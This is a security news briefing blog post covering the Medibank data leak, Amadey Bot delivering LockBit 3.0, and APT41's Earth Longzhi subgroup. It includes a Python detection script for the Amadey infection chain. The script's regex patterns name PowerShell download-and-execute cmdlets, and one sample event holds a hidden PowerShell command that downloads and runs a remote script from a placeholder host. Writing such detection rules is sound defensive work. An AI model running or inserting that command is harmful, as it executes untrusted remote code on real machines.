Les Bell
Blog entry by Les Bell
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Medibank Breach, Cont...
The Medibank saga continues to drag on; yesterday's posting of around 2.5 GB of data has been followed by more overnight. Yesterday's 'nice' list turned out to contain people who had received treatment for the usual conditions of old age, with the oldest being 105, while the 'naughty' list contained information about approximately 100 individuals who had undergone treatment for drug or alcohol abuse, or for mental health conditions. There has been at least one confirmation from an affected individual that the data is real.
The second upload seems to indicate that the cybercriminals involved are not interested in collecting individual ransoms, but are simply going to create as much damage as they can. We shall have much more to say on this and similar breaches...
Amadey Bot Distributes LockBit 3.0
The Amadey Bot infostealer and backdoor has been circulating since at least 2018, typically installing either GandCrab ransomware or the FlawedAmmyy remote access trojan. Now the AhnLab Security Emergency Response Center (ASEC) reports that attackers are using it to install LockBit 3.0.
The Amadey Bot malware itself is being distributed in two ways: first via an infected Word file which downloads another file containing a malicious VBA macro, and second via a binary executable that carries the Word program icon.
For the first technique, if the user is duped into enabling content in Word, the VBA macro installs a malicious shortcut and then runs it, causing a PowerShell command to download and run Amadey Bot itself. The executable for the second technique masquerades as a file called Resume.exe (the default Windows behaviour of suppressing filetype extensions is a big problem here), which carries Amadey directly.
Once running, Amadey Bot connects to a C2 server, sends some system information and then waits for commands, which will usually download LockBit as either a PowerShell script or as a binary. ASEC's analysis provides a description and IOCs.
Uncredited, LockBit 3.0 Being Distributed via Amadey Bot, blog post, 8 November 2022. Available online at https://asec.ahnlab.com/en/41450/.
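The infection chain above (Word macro launching a shortcut that runs a PowerShell downloader, or a bare Resume.exe double-clicked from a user folder) maps onto a couple of well-known detection rules for process-creation telemetry. The following is an added example written for this briefing, not code from the ASEC report or from the Amadey/LockBit samples: it runs those rules over a handful of constructed process-creation records (image, parent image, command line, in the shape of a Sysmon Event ID 1 or EDR process event) and reports which ones would fire. The field names and the sample events are assumptions for illustration.

```python
"""Detection sketch for the Amadey Bot delivery chain described above.

Three rules, each a heuristic a SOC would tune against its own baseline:
  1. An Office application spawning a shell or script host.
  2. A PowerShell command line that fetches remote content and executes it.
  3. An .exe in a user-writable download/temp folder launched by explorer.exe,
     i.e. a user double-clicked a downloaded binary (the Resume.exe lure).
All event records below are constructed samples, not real telemetry.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Cmdlets and aliases commonly used to download-and-run in one line.
DOWNLOAD_EXEC = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|start-bitstransfer)",
    re.IGNORECASE,
)
# Folders a browser, mail client or archive tool drops files into.
USER_DROP_DIRS = re.compile(r"\\(downloads|desktop|appdata\\local\\temp)\\",
                            re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event triggers (empty if none)."""
    reasons = []
    img = basename(event.image)
    parent = basename(event.parent_image)

    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        reasons.append(f"office-spawns-script-host:{parent}->{img}")

    if img in POWERSHELL and DOWNLOAD_EXEC.search(event.command_line):
        reasons.append("powershell-download-and-execute")

    if (parent == "explorer.exe" and img.endswith(".exe")
            and USER_DROP_DIRS.search(event.image)):
        reasons.append("user-launched-downloaded-executable")

    return reasons


def scan(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Run every rule over a batch of events; keep only the hits."""
    hits = []
    for ev in events:
        reasons = detect(ev)
        if reasons:
            hits.append((ev.image, reasons))
    return hits


# Constructed sample events: two that should alert, two benign controls.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        command_line="powershell -w hidden -c IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/stage2.ps1')",
    ),
    ProcessEvent(
        image=r"C:\Users\alice\Downloads\Resume.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r'"C:\Users\alice\Downloads\Resume.exe"',
    ),
    ProcessEvent(  # benign: user opens a document normally
        image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r'"WINWORD.EXE" C:\Users\alice\Documents\notes.docx',
    ),
    ProcessEvent(  # benign: scheduled admin script, no download primitive
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\services.exe",
        command_line="powershell -File C:\\Scripts\\rotate-logs.ps1",
    ),
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(f"ALERT {image}: {', '.join(reasons)}")
```

The first sample fires two rules at once (Word spawning PowerShell, and a download-and-execute command line), which is the strongest signal in the chain; the second fires only the weaker "downloaded executable" heuristic, which is exactly the case where showing file extensions and application allow-listing on user folders do more than detection can. Rule 3 is noisy on its own and is best treated as a low-severity enrichment rather than a paging alert.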
New Branch of APT41 Targets Asia, Ukraine
Researchers at Trend Micro are reporting on a new subgroup of the Chinese state-supported APT41 (Double Dragon), which they have christened Earth Longzhi, and which is targeting government, defense, aviation, insurance and urban development industries in Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan and Ukraine. APT41 divides its efforts between state-sponsored cyberespionage and financial crime for profit.
Earth Longzhi was initially identified in early 2022, but analysis of TTPs and code similarities suggests the group has been active since 2020. Their attacks start with a spear-phishing campaign, promising scandalous information about a person, to deliver their malware, either via a link or via a password-protected archive file. The first stage is a custom Cobalt Strike loader. Several generations of loaders have appeared; the first one was called Symatic Loader, and used a variety of anti-forensics techniques.
The later campaign saw Earth Longzhi deploy several different custom loaders, which Trend Micro has christened CroxLoader, BigpipeLoader and OutLoader, and some of these have multiple variants, suggesting the group is actively developing its tools. Post-exploitation, they also use customized tools based on open-source projects, such as a set of standalone binaries based on Mimikatz modules.
Hiroaki, Hara and Ted Lee, Hack the Real Box: APT41's New Subgroup Earth Longzhi, blog post, 9 November 2022. Available online at https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.